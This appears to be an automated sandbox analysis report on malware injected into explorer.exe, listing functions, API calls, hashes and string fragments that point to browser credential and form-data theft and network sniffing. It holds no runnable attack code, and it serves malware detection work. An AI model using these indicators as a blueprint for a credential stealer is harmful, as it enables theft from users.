                                                              • Instruction Fuzzy Hash: BC417970918A088FCB94EFA8C8957AD77E0FB58300F04027AD84ADB255EF309945CB85
                                                              Function 0B138B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: CreateMutex
                                                              • String ID: .dll$el32$kern
                                                              • API String ID: 1964310414-1222553051
                                                              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                              • Instruction ID: 85e09bb5f4108dd22562d2053e65108926ec61250b145bbe1bd1eec117d74e91
                                                              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                              • Instruction Fuzzy Hash: 17412970918A088FDB94EFA8D499BED77F0FB68300F44417AD84ADB255EF309945CB85
                                                              Function 0B13E5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 399 b13e5b2-b13e5ea 400 b13e60a-b13e62b socket 399->400 401 b13e5ec-b13e604 call b141942 399->401 401->400
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: sock
                                                              • API String ID: 98920635-2415254727
                                                              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                              • Instruction ID: 45ee3af885bc1f19e588ed47895aba5a3c53c1286d1ee8efa855fe125897f980
                                                              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                              • Instruction Fuzzy Hash: 7B012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85EDB266D7B0C9858B86
                                                              Function 0B1362DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 404 b1362dd-b136320 call b141942 407 b136326 404->407 408 b1363fa-b13640e 404->408 409 b136328-b136339 SleepEx 407->409 409->409 410 b13633b-b136341 409->410 411 b136343-b136349 410->411 412 b13634b-b136352 410->412 411->412 413 b13635c-b13636a call b140f12 411->413 414 b136370-b136376 412->414 415 b136354-b13635a 412->415 413->414 417 b1363b7-b1363bd 414->417 418 b136378-b13637e 414->418 415->413 415->414 419 b1363d4-b1363db 417->419 420 b1363bf-b1363cf call b136e72 417->420 418->417 422 b136380-b13638a 418->422 419->409 424 b1363e1-b1363f5 call b1360f2 419->424 420->419 422->417 425 b13638c-b1363b1 call b137432 422->425 424->409 425->417
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                              • Instruction ID: 02adfeb3afd655f0df1befddd8c98eb5eecb60066e3af308dab57c46f4e1c457
                                                              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                              • Instruction Fuzzy Hash: A4316BB4A08B09EFDB64EF6980882A5F7A1FB54701F44427EC92DCB206DB749664CF91
                                                              Function 0B136412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 440 b136412-b136446 call b141942 443 b136473-b13647d 440->443 444 b136448-b136472 call b143c9e CreateThread 440->444
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3264280738.000000000B110000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b110000_explorer.jbxd
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                              • Instruction ID: 3ca5d9490665baf858fcdff389ae90b9d246fadf00c6407afa37a87c4852a0fa
                                                              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                              • Instruction Fuzzy Hash: F4F0F630668A484FD788EF2CD44563AF3E0FBE8215F45063EE54DC3264DB39C5814716

                                                              Non-executed Functions

                                                              Function 10F24D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                              • API String ID: 0-393284711
                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                              • Instruction ID: 282282a5a2f9fad6d76191d69fb5a7471a95ea7cf1203ba9faadab3039e94c66
                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                              • Instruction Fuzzy Hash: C8E14874618B488FC7A4DF68D4867AAB7E0FB58300F904A2EA59FC7245DF34E541CB89
                                                              Function 10F27792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                              • API String ID: 0-2916316912
                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                              • Instruction ID: 7c5fbfc668a9897eed6290860b9edcacd1453f2067a7e4a2d8f583e6e4d1cd1b
                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                              • Instruction Fuzzy Hash: 87B18D30518B488EDB55DF68D486AEEB7F1FF98300F90452EE49AC7251EF74E4098B86
                                                              Function 10F25622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                              • API String ID: 0-1539916866
                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                              • Instruction ID: 67c0b46d8f3fcdaf9355af794abf08566cba583d9acbede33fd082eac99549f6
                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                              • Instruction Fuzzy Hash: 5D419070A18B08CBDB14DF88B44A6AD7BE2FB48B00F40026EE809D7245DBB5DD458BD6
                                                              Function 10F2CAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                              • API String ID: 0-355182820
                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                              • Instruction ID: d2722d51adbc53c70cde8bfd189aafe743027a6ff66be9ccd5c935d41b8df742
                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                              • Instruction Fuzzy Hash: E3C17A74618B088BC758EF64E486ADAF3E5FB94304F80462AA49EC7250DF74E615CBC6
                                                              Function 10F2CF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                              • API String ID: 0-97273177
                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                              • Instruction ID: b7e1b3b8bfadb72ce0527d3acb760fffba7d6ed3296c46436019c103e1097e08
                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                              • Instruction Fuzzy Hash: E751E6305187488FD709DF18D4822AAB7E5FBC4300F901A2EE8CBC7251DBB4D946CB82
                                                              Function 10F262F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                              • API String ID: 0-639201278
                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                              • Instruction ID: fc2451038f8dbba78124f3839ef886c5480e89bb5faa716f503a15b5c0b9a9df
                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                              • Instruction Fuzzy Hash: A0C1A274618A194FC748EF28E497AAAB3E1FB98300F91432DA44EC7254DF34EA45CBC5
                                                              Function 10F262F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                              • API String ID: 0-639201278
                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                              • Instruction ID: caa93d19d981c64017c83308f43db8b45548b31568d8ff6ee87d5c6c9469824b
                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                              • Instruction Fuzzy Hash: ACC1A274618A194FC748EF28E457AAAF3E1FB98300F914329A44EC7254DF74EA45CBC5
                                                              Function 10F27CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                              • API String ID: 0-2058692283
                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                              • Instruction ID: 662aa9913dd52d62d7bc01b72647d60d1e6d29793d388a135aa8aa5ec0e8d189
                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                              • Instruction Fuzzy Hash: 8CA1B1706187488BDB18DF68E4467EEB7E1FF88310F80462DE48AD7251EF74D9498785
                                                              Function 10F27CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                              • API String ID: 0-2058692283
                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                              • Instruction ID: 6ac3c6275a5c53f3bb259d6fa87d42912f47efede819f5ecb5966eae0d4db33e
                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                              • Instruction Fuzzy Hash: CD918F70A187488BDB18DFA8E445BEEB7E1FF98300F40462DE48AD7251EF74D9498785
                                                              Function 10F27352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$e$n$v
                                                              • API String ID: 0-1849617553
                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                              • Instruction ID: 7176985dea7c9eb53dac1e4959af4bb9150ef54e6d54548352569f0c5384c666
                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                              • Instruction Fuzzy Hash: 8871B431618B498FD758EFA8D4867AAB7F0FF58304F40062EE44AC7261EF75E9458B81
                                                              Function 10F22C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                              • API String ID: 0-1970020201
                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                              • Instruction ID: 8d1ba030aee957026d885b92bbc9ae82cf04a4f04c852f661aeb744542c5f711
                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                              • Instruction Fuzzy Hash: 5A514CB0918B4C8BDB54DFA4D045AEEB7F1FF58300F80462EA49AE7254EF30A541CB89
                                                              Function 10F2386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4$\$dll$ion.$vers
                                                              • API String ID: 0-1610437797
                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                              • Instruction ID: 3d396adea86d07b71ae96ac5f4e983138c2396b5adb5559c994562a1adf163df
                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                              • Instruction Fuzzy Hash: 00417635618B4C8FCBA5EF2498467EA77E4FB94301F91462E988EC7240DF34D545C782
                                                              Function 10F254B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                              • API String ID: 0-327345718
                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                              • Instruction ID: 063d2c8894dcb419f59d5eea41d0d6a0f5666a85172f5eb32564dbb827ecbc34
                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                              • Instruction Fuzzy Hash: BF418330A18E0D8FCB84EF58E09B7AD77E2FB58714F95016AA84ED7210DE35D9418BC2
                                                              Function 10F23432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .dll$el32$h$kern
                                                              • API String ID: 0-4264704552
                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                              • Instruction ID: f331ecbeffe0c5ffe31f79a0968ef23cab60735ff5959134271c64007d314743
                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                              • Instruction Fuzzy Hash: 2641B2B0608B4D8FD799DF2890863AAF7E1FBA8300F544A6E949EC3255DB70D845CB42
                                                              Function 10F2A0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $Snif$f fr$om:
                                                              • API String ID: 0-3434893486
                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                              • Instruction ID: fca5caeb271dacd4e8179caba4a2159639abb1dd67398f01bfeb3fb997b06ffb
                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                              • Instruction Fuzzy Hash: 8131F43451CB885FC71ADB28E4866DAB7D0FB84300F90491EE49BC7291EE34E549CB43
                                                              Function 10F2A0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $Snif$f fr$om:
                                                              • API String ID: 0-3434893486
                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                              • Instruction ID: ec3fe70930c1531eae55d687027f3f1d819a9e44855f3d1a5246d6cb30f3b179
                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                              • Instruction Fuzzy Hash: F331223441CB486FC719DF28E4866EAB7D0FB94300F90492EE49BC3281EE34E54ACA43
                                                              Function 10F25FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .dll$chro$hild$me_c
                                                              • API String ID: 0-3136806129
                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                              • Instruction ID: 87bc6f408c67a049e4df532664e2cef65b2d4b6ff4aed638ebbed289dccfa07f
                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                              • Instruction Fuzzy Hash: CE317E34118B484FC784EF28A496BAAB7E1FB98300FC4467DA84ECB254DF34DA45C792
                                                              Function 10F25FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .dll$chro$hild$me_c
                                                              • API String ID: 0-3136806129
                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                              • Instruction ID: 41375646d7ec2cd7816cb82f4bf1964341ef63668029faeaacb5ba6059875a7d
                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                              • Instruction Fuzzy Hash: 24318D34118B084FC784DF28A496BAAB7E1FF98300FC4463DA84ACB254DF34DA45CB92
                                                              Function 10F288C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                              • API String ID: 0-319646191
                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                              • Instruction ID: b965680745865a331a2698c83c1950792a86c6ab1447bf00ab124c14759b8d16
                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                              • Instruction Fuzzy Hash: F831B131614A4C8BCB44EFA8D8867EDB7E1FB58214F80422AE45ED7240DE78D649C799
                                                              Function 10F288BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                              • API String ID: 0-319646191
                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                              • Instruction ID: 21e3504d6d4a0e69477b9a6563e99e310e23b6a7a89c47cfda5a46b7f6fa9640
                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                              • Instruction Fuzzy Hash: E621E630A10A4C8BCB04EFA8D8467ED7BE0FF58304F80422AE45AD7240DF78D645C795
                                                              Function 10F29E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$l$l$t
                                                              • API String ID: 0-168566397
                                                              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                              • Instruction ID: fe5cd423b0c2b1315f065667fb94be0551024d1d49a59d11a2d0140e23baf9d1
                                                              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                              • Instruction Fuzzy Hash: 2F217E74A24A0D9BDB44EFA8D0457ADBAF0FB58310F90462DE409D3600D778E555CB84
                                                              Function 10F29E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$l$l$t
                                                              • API String ID: 0-168566397
                                                              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                              • Instruction ID: 6f632d24d6fd3d945b09ce618de65d68c23c0f00d843a41449c0ea26aa899a8b
                                                              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                              • Instruction Fuzzy Hash: 57218D74A24A0D9BDB04EFA8E0467EDBBF0FB58310F90462DE409D3600DB78E555CB84
                                                              Function 10F29FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3266813701.0000000010EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_10eb0000_explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: auth$logi$pass$user
                                                              • API String ID: 0-2393853802
                                                              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                              • Instruction ID: 69d2e67fb2beaaf9c59c59fee2d7fe408fa4e5e2eb853e757d725372f6fcfc80
                                                              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                              • Instruction Fuzzy Hash: 3D21C030624B0D8BCB45CF99A8826DEB7E1EF88354F405619E40ADB284D7B4E9188BD2